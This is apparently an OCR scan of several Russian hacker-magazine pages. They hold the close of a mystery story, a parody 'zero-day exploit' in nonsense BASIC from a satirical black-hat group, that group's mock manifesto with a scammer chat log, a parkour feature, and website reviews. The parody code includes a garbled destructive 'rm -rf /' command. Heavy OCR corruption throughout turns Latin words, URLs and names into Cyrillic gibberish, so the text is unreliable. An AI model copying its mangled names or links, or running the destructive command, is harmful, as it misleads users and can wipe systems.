он долларов за неделю работы, отказываться было глупо. Может быть, 
перебесится после того, как «судный час» пройдет? 

Джон взглянул на время. Оставалось 10 минут. 

— Мистер Столпери, о вами там все в порядке? — спросил он, связав- 
шись по рации. 

— К-кажется да, — раздался из трубки дрожащий голос. 

Харли связался с ребятами, которых он поставил охранять двери в ком- 
нату клиента. Ничего подозрительного... 



Джон пошел отлить, по пути размышляя, от чего у людей так едет кры- 
ша. Наверняка был какой то переломный момент. Срок, о котором го- 
ворил Столпери истек, как Харли и предполагал, ничего не произошло. 
В дом не ворвались киллеры, не произошло ни взрыва, ни нашествия 
пришельцев. 

Джон связался с клиентом. Рация молчала. 

Начальник охраны проследовал к комнате, в которой находился 
Джефф. Его парни были на месте. 

— Ничего? 

— Чисто, — ответил один из них. 

Джон постучал в дверь. 

— Мистер Столпери? 

Тишина. 

— Мистер Столпери, с вами все в порядке? 

По ту сторону двери не было слышно ни звука. 

Начальник охраны отошел на метр и резким движением выломал дверь. 
Внутри, в обнимку с ноутбуком неподвижно лежал Джеффри Столпери. 
На экране виднелось изображение мохнатого чертика, который, каза- 
лось, смеялся над ними. Изображение на мгновение замерцало, после 
чего монитор погас. 

Джон бросился к телу, понимая, что уже слишком поздно. 

* * * 

В лаборатории стоял легкий запах медикаментов. Следователь, Гарри 
Олдер, с тоской смотрел на труп, прикрытый простыней. 

— Да, не повезло бедняге. Еще вчера выиграл кучу денег, а сегодня 
уже умер, — вздохнул следователь. 

— Ну, этот хоть что-то выиграл, — полицейский медэксперт, Сэм Вел- 
бери, оторвался от документов и подошел к нему. 

— Что случилось, Сэм? 

— Сердце отказало. Честно говоря, странный случай. Весь организм 
как огурчик, но инфаркт такой, как будто у старика какого-то. 

— Может, принял что-то? 

— Полное отсутствие лекарств в крови. Я бы тебе сразу сообщил. 

— Мне сказали, что он заранее знал время своей смерти. Мог он пси- 
хологически подвести себя к этому? 

— Все может быть. Стресс, страх, кто знает, что еще творилось у него 
на душе. Попробуй-ка поживи, уверенный, что завтра тебя не станет. 

— Никаких синяков, царапин? 

— Абсолютно. 

Олдер уже успел поговорить с близкими умершего, все как один утве- 
рждали, что тот был здоровым малым как физически, так и психологи- 
чески. И стремлений к самоубийству за ним не наблюдалось. 

— Окей. Спасибо, Сэм. 

— Нет проблем. 

Следователь вышел из лаборатории медэкспертизы. Все в этом де- 
ле говорило о том, что его способности не понадобятся. Но все-таки 
смерть внезапного миллионера не давала ему покоя. В куртке зазво- 
нил мобильник. 

— Алло? 

— Привет, Гарри. Это я. В общем, посмотрел я твой ноутбук. Он в аб- 
солютно нерабочем состоянии. Это даже компьютером назвать сложно 

— скорее муляж, внутри которого нет ничего. 

— В каком смысле? 

— Ни процессора, ни памяти, ни винчестера. Внутри пусто, как в голо- 
ве у моей женушки. 

— Ладно, спасибо, Майки. Я твой должник. 

Следователь задумчиво закурил, пуская в воздухе кольца. Охранник, 
который первым обнаружил труп, сказал, что в тот момент ноутбук ра- 
ботал. Но каким образом, если, как сказал Майк, в нем отсутствовали 
вое детали? Выходит, соврал? Зачем? 

Г арри Олдер почувствовал, что дело не закроется так быстро, как ему хоте- 
лось. Докурив сигарету, он отправил ее в мусорный бак и зашагал к выходу. 



-еоі- 
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* ОРФОГРАФИЯ АВТОРОВ СОХРАНЕНА 
В МЕСТЕ МЫ СИЛА!!! ВСТУПАЙ И КОМПЕЛИРУЙ!!! 



ВСЯ ПРАВДА О СЦЕНЕ И НЕ ТОЛЬКО 
ОТ ИСТИННО ХЭКЕРНОЙ ГРУППИРОВКИ 
ЧЕРНОШЛЯПНИКОВ (А ТАКЖЕ ВОЙТОХЕДОВ)* 



ПРИВАТНЫЙ ОДЕЙ СПЛОЕТ ОТ БХП КРЮ1 



'! КОДИРОВКА ДЛЯ ЛЕНУКСА! ХЭКЕРЫ! ЛЕНУКС РОЛИТ ! ! ТА | -ЬЛЦЬБг -Т-І+-!!! 

' ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! 

' ! РКІѴАТЕ ! сіо ЛОТ Ргасіе!!сіо ЛОТ Ргабе!!сіо ЛОТ РгабеМсІо ЛО! РКІѴАТЕ! 

'! РКІѴАТЕ ! делать НЕ торговать !! делать НЕ торговать !! делат ! РКІѴАТЕ ! 

'! РКІѴАТЕ ! из ѵРи.огд 2 ЪНсгем . огд\ \ОЬРЕЛ 50КСЦЕ\\#!гт -гР/ ! РКІѴАТЕ ! 

'! РКІѴАТЕ ! ЛОЛ ОІЗСЬОКЕІЛОЛ ОІЗСЬОКЕІЛОЛ БІЗСЬОКЕІЛОЛ БІЗС ! РКІѴАТЕ ! 

' ! РКІѴАТЕ ! сплоет нулевого дня от адепта ОчСАЕЕ ! РКІѴАТЕ ! 

'! РКІѴАТЕ! !ПРИ КОМПИЛЯЦИИ НА СЕРВЕРЕ ИСХОДНИК УДАЛИТЬ! ! РКІѴАТЕ ! 

1 ! РКІѴАТЕ ! кюбесик ремоуте эксплоит БАГ НАШЕЛ Я ! РКІѴАТЕ ! 

'! РКІѴАТЕ! ВСТУПАЙТЕ И КОМПЕЛИРУЙТЕ ! В МЕСТЕ МЫ СИЛА!!! ! РКІѴАТЕ ! 

'! РКІѴАТЕ ! ВИНДОВС РЕМОТ СПЛОИТЕР, ЕБ"Т 134 ПОРТ (ТСР\ІР) !!! РКІѴАТЕ ! 

'! РКІѴАТЕ ! дгееРг Ро: Еуосіог, Зоіаг Оезідпег , Р1ігаск_5РиГГ ! РКІѴАТЕ ! 

1 ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! РКІѴАТЕ ! 

' ! АВТОР НЕ НЕС"Т ОТВЕЦТВЕННОСТЬ ЗА НЕЗАКОННОЕ ИСПОЛЬЗОВАНИЕ СПЛОЕТА 
'УКРФКПКст Л 2ч. 3 (С) 

СЬЗ ' отчищаем стек от переменных 

КЕМ геР 0хЬРЬРРс43 ѵ?іпсі0и5 гЗР и53 ІР РО ЦЗск. . ' [сепзогесі] антивирус 

'Кашпировского, подставляя заведомо ложную сигнатуру тела 

ТКОЕЕ ' запрещаем дизосомблирование сплоита для защиты от других хэккеров 
ЪиРРег = ЕКЕ (-2 )' определяем свободный буффер 
РКІЛТ " [+] ВиРРЗг Ьескег", ЬиРРег 
зр1оіР$ = НЕХ$ (ЬиРРег) + НЕХ$ (ЬиРРег) 

РКІЛТ "[ + ] зріоір із [ар] Ох", зр1оіР$ 

^тр = ІЛТ(80) 'вызов ядра 2.4.13 ленукса для инжекции шеллкота 31337 
СОЬОК 4 ' устонавливаем цвет для дефейса 

РКІЛТ " [ * ] БЕЕАСЕВ" ' дефейсим сайт . . НЕ ЗАБУДЬ ИСПОЛЬЗОВАТЬ АНОНИМНЫЕ ПРОКСЕ ! 
РКІЛТ " [+] ЗРагРіпд зсаппіпд геРигпз Ро ТНЕ ЬІЛЦХ/Ыіпсіоиз" 

ЕОК і = 1 ТО 33 'цыкол с перебором адресов возврата 
зр1оіР$ = зр1оіР$ + НЕХ$ ( і ) 

РКІЛТ " [+] Тгуіпд геР", зр1оіР$ ' поиск закладок и кук 
ЗЬЕЕР 1 ' Задержка, чтобы не сгорел СРУ 
ЛЕХТ 

РКІЛТ " [ + ] Пескесі зискеззРиІу !!!" 

ІЛРЦТ "С:\>", х 'зНеІІсосіе Неге 
31337 СОТО 31337 'іііре до Ро іііре 




где искать БХП? 

Здесь ІтНр://Ыісгѳѵѵ.ІіѵеіоигпаІ.сот. 
здесь Нйр://ЬН сгеѵѵ.ііѵеіоигпаі.сот 
и здесь Мир://ЬиаегИикег.пагосІ.ги. 
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ТЕХТ ВІІОѲЕП НІЖКЕВ СРЕѴѴ / ВНСКЕШ@МАІІ_.Ви, НТТР://ВНСПЕѴ\ШѴЕаОІІІШАІ_.СОМ/ 



Здравствуй. Сегодня на страницах этого уникального хэ- 
керного чтива тебя приветствует не менее уникальный ези- 
нос, широко известный в узких блэк-войтхэд кругах, как 
бригада ломателей-черношляпников — Виддег Никкег Сген. 

Но для начала, расскажем немного о себе. 

Мы пришли, чтобы говорить Правду. Все, что скрывает в 
себе андеграундная сцена хэкеров и программистов . Та са- 
мая сторона, которая сокрыта от обывателя (то есть от 
тебя) , но открыта нам (то есть непосредственно войтхед 
черношляпникам) . Мы знаем все. От ... и до . . . включи- 
тельно. Легендарная группа ВНС была организована 14 дол- 
гих лет назад. Специализировались мы в то время на напи- 
сании простейшего вредоносного кодеса (а, стало быть, и 
вирусов) на ПЭВМ типа Искра, а позже — на ЕХ-Зресбгит, 
совместимые с ПЭВМ для всей семьи и пользования. Наши 
программы быстро завоевали успех и признание в узкой (но 
не) среде черношляпников . Да и немудрено, ведь посмотри, 
какие мы писали программы (мы и сейчас их пишем тоже) : 

10 ргіпбі "ті котапсіа ѵоісШесіоѵ па РС Ізкга, тозком 
1987, 15 з ап . " 

20 добо 10 

Этот незамысловатый сплоет был более продвинут, нежели черви 
Моррисинга и программы Отбывшего (Тгее) Кевина. Но разби- 
раться в ней мы не станем, а пока продолжим повествование . 
Итак, 14 лет назад бригада войтхед подразделения тогда 
еще не очень легендарных (но уже и тогда) взломщиков 
вступали на тропу борьбы. Борьбы с одептами. Уже тогда 
мы заподозрили неладное, когда на радиорынке нам вместо 
ПЗУ для совместимой машины продали всего-навсего резис- 
тор маркировки В.100. Позже некоторые из нас получали 
пустые дискеты вместо программ уже на них. В общем, нам 
надоело носить маски, и мы решили их снять. Сказать на 
весь мир Правду обо всем. 

Сегодня прошло 15 лет. Мы не такие молодые и озорные, 
какими были когда-то, но цель наша до сих пор видна и 
определена. Мы должны нести в мир Правду и Истину. Всту- 
пай скорей к нам и компелируй еще немного этого шелкода, 
а, стало быть, и программ для срыва стекеров и шапок. 

В месте (в темном) мы откомпелируем планету и уличим всю 
гниль . Всех тех прыщавых и обиженных судьбой людей, что 
всю жизнь проводят за монитором, боясь скомпелировать 
еще немного этих гантелей. Но ты, читающий журнал Хакер, 
не такой. И поэтому мы пишем для тебя эти строки. Эту 
своего рода рекламу, для того чтобы ты УЗНАЛ ВСЕ, и при- 
шел на ііббр : //Ьіісген . Ііѵеі оигпаі . сот и компелировал 
вместе с нами еще и еще! Ведь вместе мы сила! 

Но оставим браваду и громкие лозунги (хотя не существует 
никаких других громких лозунгов, кроме «В МЕСТЕ МЫ СИЛА» 
и «ОНИ НИ [сепзогесі] НЕ ЗДЕЛАЮТ») , и поговорим о насущном. 
А именно о том, что мы можем предложить тебе . Скорее 
всего именно ТЕБЕ нам уже предложить нечего, так как ты 
уже читаешь на страницах такого элетарного журнала, как 
Хакер (взлом и проникновение) рекламу войтхед группировки 
ВНС. Однако не все так плохо, и многие самые отважные 
одепты стучат к нам по вопросам самого различного толка: 

ЫоЫе: Ні 
ЫоЫе: зсіез? 

тг. Виддег з: здравствуйте 
ЫоЫе: бі акі ргобаезк? 

ЫоЫе: Ьапк ассоипбз 
ЫоЫе: ? 

тг. Виддег з: аки, сплоеты, шелкоды и зеро дей 
тг.Виддегз: а также могу продать шапку петушок 
тг. Виддег з: дабы украсть еще этих вебманей 
ЫоЫе: Іоі 
ЫоЫе: а зегегпо? 

тг.Виддегз: а что вам нужно смотря ? 

ЫоЫе: ик Ъапкі 



ЫоЫе : кз'Ьа'Ы ро зріоібат бо}е езб гагдоѵог 
тг.Виддегз: хорошо, переводите 200 вмз и подберем что 
нужно 

ЫоЫе : бі з какодо Тогита? 

ЫоЫе : ^е1абе1по изаб' дагапба 
тг.Виддегз: не с какого 

тг.Виддегз: переводите скорее еще этих вебманей чтобы 
мне купить кокса 

ЫоЫе : как Ьі пек іеіапі^а Ьгозаб сіепді паіеѵо паргаѵо 
ЫоЫе : і рохосіи 4бо га регеѵобібе 200$ 

ЫоЫе : ^а езііе пе зкагаі 4бо тпе пи;іпо 
ЫоЫе : то^еб и бекда і пеки с^е 

тг.Виддегз: да, но 200 шекелей это же не деньги 
тг.Виддегз: просто переводите и все. 

Это типичный представитель сообщества скамерсатнов . 

То есть попросту говоря — вор, который не наделен особым 
умом (хотя, казалось бы, как же так?). Одним словом, 
уважаемый одепт, мы вынуждены сделать открытое зоявление: 
«С вами Легендарный Хэкерный Езинос Виддег Никкег Сгем. 

Мы опять и снова предлагаем кругам порочного ондеграунда 
еще этого хэкерного чтива, которое мы будем релизить еще 
много-много лет . Ведь в нашу задачу входит как минимум вы- 
вести всю элиту на чистую воду. Показать вам ИСТИННОЕ НУТ- 
РО. Снять ореал таинственности и робенгудства и навесить 
ярлыки скамерсантов, жыдохэкеров и просто поганцев различ- 
ных мастей. 

Поэтому Мы, Виддег Никкег Сгем (умеем также компелиро- 
вать) открыто сообщаем на весь ми р (и пусть не одна 
[сепзогесі] , сидящая за кампиком, потом не говорит, что 
не слышала) — мы, да МЫ (и только мы) пришли, чтобы го- 
ворить ИСТИННУЮ ПРАВДУ. И только мы можем делать это 
и еще много другого. Из раза в раз (из зиноса в зинос) 
мы знакомим вас с элитой хэкерных, вирмейкерных, скам- 
мерсантских и просто кодерских сообществ и показываем 
все нутро этой клоаки, куда тебя сейчас затягивает (ото- 
ропись хэкер пока еще не слишком поздно ! ) . 

Мы окунем тебя в мир завистливых и алчных мразей, кото- 
рые готовы делать что угодно лишь бы получить очередной 
сплоет с шеллообменника (см. зеро ди сплоет на врезке) , 
в мир где правят прыщеватые подростки на этапе созрева- 
ния или мужчины, которые из года в год компелировали 
сплоет, но так и не смогли это сделать. В тот самый мир, 
где хэкер, носящий провода типа МГТФ или компелирующий 
документы типа мсворд-эксель может почувствовать себя 
сильным и властным, воспользовавшись, например, уникаль- 
ной программой, которая позволяет общаться в реальном 
времени в комнатах общения». 

Одним словом, говорить можно очень долго. И в этом, на- 
верно, нет смысла, ведь смысл есть только в том, чтобы 
прочитать ВСЕ выпуски ВНС и найти там либо всего себя, 
либо часть. Однако бойся, если ты хочешь остаться тем, 
кем ты являешься, не желая свернуть на путь добра (его 
указывает перст ВНС и больше никто, разумеется) . Бойся 
БХЦ, потому что мы ВЕЗДЕ И ВСЮДУ. Наши одепты опутали 
даже омерику, и мы знаем все, что творится в головах че- 
ловеков. И если вы будете продолжать делать ЭТО, БХЦ 
найдет и тебя, и тогда уже ничто не поможет. 

Так что, если ты все же решил вступить и скомпелировать 
в месте с нами, все, что тебе нужно, — это ознакомиться 
с документом ііббр : / /Ыісген. Ііѵеі оигпаі . сот/ 10 4 90 . іібті , 
выполнить незамысловатые указания (а именно написать 
стотью и прислать ее на электроящик) и компелировать в 
месте с нами! Однако в заключение мы должны тебя предуп- 
редить, что каждый может оказаться одептом, пытающимся 
выдать себя за элитарного войтхед-бригадира черношляпни- 
ков. Поэтому сначала остановись, стряхни пыль с монито- 
ра, постирай носки. И в бой! 

В МЕСТЕ МЫ СИЛА! ! ! ВСТУПАЙ И КОМПЕЛИРУЙ! ! ! 

ВШАКѴ ѴОІІВ’5 ~Н~ 
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В наш век тотальной урбанизации 
и многомиллионных городов авто- 
мобильные пробки не исчезают с 
дорог ни днем, ни ночью. В усло- 
виях постоянной спешки люди вы- 
нуждены придумывать все новые 
и новые способы передвижения. 
Роликовые коньки, велосипеды, 
скутеры — все это помогает чело- 
веку двигаться быстрее. Но иног- 
да бывают такие ситуации, в ко- 
торых человек не может использо- 
вать подручные средства. Что де- 
лать, если возможностей завести 
машину или одеть роликовые конь- 
ки у тебя нет? Вряд ли ты поду- 
маешь о своем скейтборде, если 
попадешь в эпицентр массовых 
беспорядков, или если толпа пси- 
хопатов попытается тебя ограбить 
и убить прямо на улице. 

Конечно, можно поиграть в героя 
голливудских боевиков, но в дан- 
ных случаях это попросту глупо, 
а главное, очень вредно для здо- 
ровья. Первая мысль, которая 
возникнет у любого здравомысля- 
щего человека, когда возникает 
угроза для жизни, — это убежать, 
укрыться, чтобы сохранить свою 
жизнь . В такой момент для тебя 
перестанут существовать любые 
ограничения. Перила исчезнут, 
заборы растворятся, стены разру- 
шатся в сознании. Для 
тебя будет только существовать 
прямая из точки «А» в точку «Б» . 
Все, что будет окружать тебя, 
станет полосой препятствий. 

И именно ее ты должен будешь 
преодолеть . 



иге . зтѵи 




иьѵвшѵ иѵькльѵ 



ХАКЕРСКИЙ ПОДХОД К ПЕРЕМЕЩЕНИЮ 
В ПРОСТРАНСТВЕ ОТ ТВАСЕВЗ.ВЦ 




НЕТ ПРЕГРАД, А ЕСТЬ ЛИШЬ ПРЕПЯТСТВИЯ 
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паркур (ЬЕ РАККОІЖ) 

Искусство максимально быстрого и эффективного перемещения — вот, что значит паркур. Дисциплина, 
представляющая собой совокупность навыков владения своим телом, которые в нужный момент могут понадобиться 
любому человеку. Это умение быстрее других оказаться там, где необходимо. Нужно залезать, перепрыгивать 
и перемещаться на большие дистанции. Паркур не учит использовать какие-либо средства, хитрые приспособления 
или оружие, а позволяет развить навык поведения в условиях «здесь и сейчас». Деревья, стены, крыши — это все 
препятствия, с которыми можно столкнуться в любой момент и при любых обстоятельствах. Опыт преодоления своих 
страхов, неуверенности, полученный путем множества тренировок, научит тебя видеть путь везде. 

Занятия паркуром почти не имеют ограничений. Им может заняться абсолютно любой человек, независимо от пола или 
физической подготовки. Однако одно ограничение есть — возраст. Конечно, детям можно заниматься паркуром, но 
интенсивность их тренировок должна быть в десятки раз ниже, чем у взрослых. Ведь в подростковые годы человек все 
еще развивается, а его тело формируется, поэтому до 15 — 16 лет ему не следует выполнять элементы, которые могут 
подвергнуть тело серьезным нагрузкам. До этого возраста ему необходимо подготовить себя к дальнейшим 
тренировкам. В это время лучше всего сконцентрироваться на фитнесе, контроле за движениями и тренировать 
ловкость. Прыжки с больших высот или выполнение сложных элементов паркура могут привести к серьезным травмам, 
из-за которых уже к 20 годам может появиться замечательная возможность провести остаток своих дней в инвалидной 
коляске. 
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те рмины рагкоиг и Фгасеиг 

Само слово РАККОШ. произошло от видо- 
измененного французского военного тер- 
мина — Рагсоигз сіи сотЪа'Ь'ЬапІ:, что 



дословно можно перевести как «полоса 
препятствий» . 

Людей, которые занимаются паркуром, 
называют трэйсерами. Трэйсер (фр. 
Тгасеиг) — это человек, который «прок- 
ладывает новые пути» . 



философия 

Для начала нужно понять, что же такое паркур. Паркур — это не только преодоление препятствий физических, 
но и преодоление препятствий внутри себя. Это постоянная борьба с любыми проявлениями отрицательных ка- 
честв человека, таких как лень, злоба, жадность еіс. «Нет преград, а есть лишь препятствия» — это девиз трэй- 
серов всего мира. Он применим ко всему. К примеру, не умеешь ты чего-нибудь делать, чего-нибудь для себя 
действительно полезного, и тебе банально лень этому научиться. Обычный человек может позволить себе под- 
даться слабости и не заморачиваться. Трэйсер же, наоборот, загорится желанием научиться этому как можно 
скорее. Путь паркура — это постоянное самосовершенствование как в физическом, так и в духовном плане. 
Практически любой трэйсер, помимо самого паркура, занимается боевыми искусствами (ведь не всегда есть 
возможность убежать), скалолазанием, а также считает нужным знать основы медицины. Некоторые даже прак- 
тикуют медитацию и занимаются йогой. Ведь преодоления любых внешних препятствий начинается не с прыж- 
ков и кувырканий в воздухе, а с преодоления барьеров у себя в голове. 

Во время тренировок трэйсеры пробегают огромные дистанции, исследуя город вдоль и поперек. Иногда марш- 
руты нашего движения могут не понравиться стражам правопорядка или обывателям (чаще всего пожилым лю- 
дям). Трэйсеры не нарушают закон, не занимаются вандализмом или воровством. «Цели будоражить спокой- 
ствие мирных граждан у нас нет, поэтому, если тебя попросят уйти с места твоих тренировок, то не стоит пре- 
пираться или устраивать скандал. Нужно просто уйти. Ведь город огромен, и мест для саморазвития много». 




ОБЯЗАТЕЛЬНО загляни на диск 
и посмотри одноименное 
трэйсерское видео. 
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Основателем паркура является Да- 
вид Белль. Он родился 29-ого 
апреля 1973 года в округе Зеіпе 
Магібіте, в городке под назва- 
нием Фекам (Еесатр) , что в Нор- 
мандии . Он был родом из небога- 
той семьи, которая жила сначала 
в пригороде Парижа, Фекаме, а 
позже перебралась в городок Ле- 
Сабль-д'Олон (ЗаЫез сі'ОІоппе), 
где Давид провел первые четыр- 
надцать лет своей жизни. Воспи- 
тываемый дедом, Гильбертом Кит- 
теном, бывшим старшим сержантом, 
некогда служившим в пожарных 
войсках Парижа, Давид был впе- 
чатлен рассказами о героизме, и 
с раннего возраста в нем прос- 
нулся интерес ко всему, что 
подразумевало под собой движение 
и активность . Его отец, Раймонд 
Белль, служивший некогда солда- 
том во французской армии (в го- 
роде Далат во Вьетнаме) , также 
работал в пожарных войсках Па- 
рижа и был вьщающимся спортсме- 
ном. Будучи окруженным такой 
семьей спортивных героев, Давид 
стал искусным во многих спор- 
тивных дисциплинах, где было 
необходимо двигаться, таких как 
легкая атлетика, гимнастика, 
скалолазание и боевые искусства. 
В 15 лет Давид переехал в при- 
город Парижа, маленький городок 
Лисе, что находится рядом с Эв- 
ри. В это же время он встречает 
молодых людей, которые впослед- 
ствии следуют за ним. Уатаказі 
— так они стали называть себя, 
впоследствии Люк Бессон снял о 
них фильм с одноименным назва- 
нием. Именно с этими людьми Да- 
вид был нераздельно связан на 
протяжении 8 лет. На пути са- 
мопознания молодой Давид ос- 
тавляет школу, чтобы полностью 
посвятить себя спорту. Но не 
любому виду спорта . Белль счи- 
тал, что спорт должен быть по- 
лезен для жизни. «Сила и лов- 
кость, развиваемые через 
спорт, должны также находить 
применение в жизни», — так 
отец Давида всегда говорил 
ему. 

Впоследствии Давид часто вообра- 
жал, где бы он смог использо- 
вать свои физические данные, 
чтобы избежать трудных ситуаций, 
где бы он мог проявить силу и 
храбрость . Как добраться к мес- 
ту, чтобы спасти человека? Как 
перемещаться, чтобы не быть 
пойманным в ловушку? 

Его жажда приключений и желание 
свободы сложились в искусство . 
Искусство, представляющее собой 
совокупность дисциплин, которыми 
занимался его отец, будучи еще 
молодым солдатом во Вьетнаме . 
Гимнастика, преодоление страха, 
концентрация, идея о перемещении 
в любое место без физического 
ограничения, чувство свободы — 
все это стало пар куром. 





неверные суждения 

Вообще, у многих людей (обычно люди, не практикующие паркур) складывается оши- 
бочное мнение о том, что паркур — это экстремальный спорт или уличная акробатика. 
Паркур не является ни тем, ни другим. Отношение паркура к экстриму так же сомни- 
тельно, как и к любому существующему виду спорта. Слово «экстрим» с английского 
означает «крайность», то есть предполагает риск, работу на пределе возможностей, 
иногда даже на грани жизни и смерти. Идея паркура совсем в другом. Тренировки для 
возможности прикладного применения получаемых навыков окажутся полезными на 
деле только при выполнении двух условий: первое — ты достиг определенного уровня 
подготовки; второе — ты в состоянии применить свой уровень, используя нынешние 
ресурсы организма. В паркуре всегда следует делать только то, на что ты способен. 
При этом планку своих возможностей необходимо ставить чуть ниже, чем она есть на 
самом деле. Паркур также не является акробатикой, потому что в первую очередь пар- 
кур — максимально рациональное и быстрое перемещение. Будешь ли ты исполнять 
разного рода сальто, если ты преследуешь вора, укравшего у тебя бумажник? Любо- 
му прохожему (а, главное, самому вору) будет просто наплевать на твои кульбиты в 
воздухе. Впечатления окружающих не стоят твоего имущества, поэтому каждая секун- 
да будет тебе дорога. Используя акробатику, ты замедлишь движение, и подвергнешь 
себя лишней опасности получить травму. Важно не забывать, что главный принцип 
паркура — эффективность. Акробатика не является эффективной и подвергает трэй- 
сера риску. Поэтому ее применение в перемещении попросту нелогично. Несмотря на 
это, в большинстве видео о паркуре можно заметить акробатические приемы. Но это 
все для того, чтобы добавить в видео зрелищности и показать удивительные возмож- 
ности человеческого тела. 
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УУУУУУ.ТВАСЕЯЗ.ЯЦ — все о паокѵое в России 

ѴѴѴѴѴѴ.І.ЕРАКОЦВ.ВЦ — самая большая в мире библиотека видео о паркуре 
ѴМУІ/.РАѴУА.ЯЦ — сайт российского представительства Международной Ассоциации Паркѵра. 



интернет как часть культуры 

Уникальность нашего сообщества заключается еще и в том, что трэйсеры всего мира пос- 
тоянно общаются, обмениваясь информацией через Интернет. В Сети можно найти огром- 
ное количество фото- и видеоматериалов, посвященных паркуру. Все это призвано разви- 
вать и совершенствовать дисциплину. Приехав в любой город, ты найдешь единомышлен- 
ников, которые всегда будут готовы помочь. Ведь одна из основных задач паркура — это 
помощь другим людям. Вполне обычным является то, что у трэйсера из Сибири есть друзья 
из Англии, Америки или из Африки. У людей, занимающихся паркуром, нет языковых, рели- 
гиозных или расовых ограничений. Именно такая сплоченность позволяет паркуру распро- 
страняться и стремительно набирать обороты по всему миру. 



кино и паркур 

Впервые мир увидел паркур в 2001 году 
в фильме «Ямакаси: новые самураи» 
(Уашаказі: Ъез затоигаіз без іетрз тоб- 
егпез) , продюсером которого был Люк 
Бессон. Идея фильма родилась у него, 
когда он познакомился с трэйсерами од- 
ноименной команды. Впоследствии в 2004 
году было снято провальное продолжение 
этого фильма — «Ямакаси — Дети Ветра» 
(Уашаказі Ъез Еііз би ѴепР) . Буквально 
через несколько месяцев в мировой про- 
кат выходит еще один фильм — «13 район» 
(Вапііеие 13) , продюсером которого так- 
же выступает Люк Бессон . Но в отличие 
от предыдущих фильмов этот отличается 
тем, что главную роль в нем сыграл Да- 
вид Белль, показав в фильме реальное 
применение навыков паркура . 



от редактора 

У меня дома есть телевизор, но я его 
редко включаю. Как-то не до этого. 
Всегда найдется, чем еще заняться. 

Но однажды я все-таки его включил. 
Включил и не смог оторваться. Крутили 
бессоновский «13-ый район». Культура 
движения и перемещения главного героя 
заставили меня срочно лезть в поиско- 
вик, чтобы узнать об этом подробнее. 

В итоге я догуглил до сайта 
бгасегз . ги . Тотчас скачал видео и сно- 
ва офигел. На нем были ребята, двигаю- 
щиеся так, словно для них нет ни стен, 
ни каких-либо препятствий, ни гравита- 
ции. А теперь, когда я знаком с Вуглу- 
скром, я точно начну тренироваться. 

Это ведь действительно хакерский подход 
к передвижению в пространстве . Чтобы 
лучше меня понять, залезь на диск, 
посмотри видео. 

Николай догі Андреев 



РАКА 

РАИА (Рагкоиг здогібмібе аззосіаііоп) — 
Международная Ассоциация Паркура, ос- 
нованная Давидом Беллем. Цель ассоци- 
ации — распространять паркур в истин- 
ном его понимании. 

РАДОА Киззіа — одно из наиболее про- 
дуктивных и уважаемых представительств 
Международной Ассоциации Паркура . РАМА 
организует тренировки по собственной 
программе, выпускает экипировку, раз- 
работанную специально для паркура . 

РАЭДА занимается выпуском видеороликов 
и фильмов, организацией фотосессий, 
проведением акций, фестивалей и дру- 
гих мероприятий. Среди наших заслуг — 
победа на «Всероссийском Фестивале 
Спортивного Видео», организация премь- 
еры фильма «13 район» Люка Бессона и 
приезд в Москву главного героя фильма 
Давида Белля. 

В июне, совмесно с компанией АТНЪЕТЕ 
ШЪЪр : / / перабаеі . ги/ ) , РАЭДА проведет 
Фестиваль паркура, который будет на- 
зываться «АРЫ еіе -переворот». Уникаль- 
ность фестиваля заключается в том, 
что это первое в мире мероприятие по- 
добной направленности, которое будет 
иметь действительно огромные масштабы. 
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ТЕХТ ИВАН КУЗНЕЦОВ АКА ЗЕЕР / ѴѴѴѴѴѴ.КОХТОМ.КІЕѴ.ІІА / 
ИВАН СКЛЯРОВ / ѴѴѴѴѴѴ.8КІ.ѴАЯОРГ.ѴШ / 



мия 

шшшш 



шшшиш 



За несколько сотен русских денег в месяц из тебя удаленно обе- 
щают сделать программиста, ѵѵеЬ-дизайнера, м/еЬ-разработчи- 
ка и даже научить английскому. Этот проект, может, и не попал 
бы никогда в обзор нашего журнала, если бы на нем еще не 
существовало такого забавного курса, как «Взлом и защита про- 
граммного обеспечения». Как заявляют на сайте, после прохож- 
дения этого курса ты сможешь взломать практически ЛЮБУЮ 
СОВРЕМЕННУЮ ПРОГРАММУ! И, конечно, создать очень надеж- 
ную защиту. Причем курс рассчитан на людей, начинающих с 
нуля. Никаких специальных знаний не требуется. 



«ѵѵѵѵ.рго і и I I ІІіД III Т г 11 ** 'НІ 1 
Энциклопедия сетевых протоколов! 



Иногда, поддавшись внезапному чувству ностальгии, непреодоли- 
мо хочется вернуться в беззаботное детство. Игры в казаки-раз- 
бойники и электроника ИМ-02, советский лимонад, купленные на 
вырост джинсы, заветная жевательная резинка «баблгам». Этот 
сайт посвящен воспоминаниям людей, которые родились с 1976 
по 1982 год. Проект для всех, кто вырос в огромной стране под 
названием СССР. Авторам проекта пришлось вспоминать все до 
мелочей о тех временах. Принесли старые игрушки, фотографии, 
с антресолей достали пыльные открытки, с дач привезли подшив- 
ки журналов, и теперь на страницах сайта собрано то, что опре- 
делило взрослость родившихся в период 76 — 82. Посетив сайт, 
ты тоже сможешь поделиться своими воспоминаниями со всеми и 
принять непосредственное участие в создании детства 76 — 82. 



Хочешь получить информацию о недостатках различных сетевых 
протоколов и способах атак на них? Получить сведения о новых 
появившихся спецификациях протоколов? Пользоваться различ- 
ными сетевыми утилитами, такими как Ісрсіитр, еібегеаі, ірІаЫез, 
агрІаЫез, сізпіГГ, бпззрооі, еЫаЫез, ззбтііт, ѵѵеЬтіІт? Тогда тебе 
нужно посетить «Энциклопедию сетевых протоколов от ВІІ_ІМ 
Зузіетз». Здесь все новости из мира сетевых протоколов, доку- 
менты, спецификации, программы и даже форум. 



|НЦр://іпЬЬе2.пеі:.ги| 



[ВШЯЯ 



Небольшой, но полезный русскоязычный сайт по безопаснос- 
ти. Имеются как авторские статьи, так и переводы зарубежных 
мануалов, вот лишь некоторые названия: «ЗОБ Іфесііоп тапиаі», 
«Организация Иопеуроі в ѴМѴѴаге», «Меняем ответ сервера 
арасбе(\л/іп32)», «Надежное удаление информации на жестких 
дисках, дискетах, 115В РІазН и других носителях». Интересны 
также программы и сервисы, созданные авторами сайта, напри- 
мер, обновляющиеся каждые 15 минут. Список анонимных прок- 
си, программа для детектирования запущенных виртуальных 
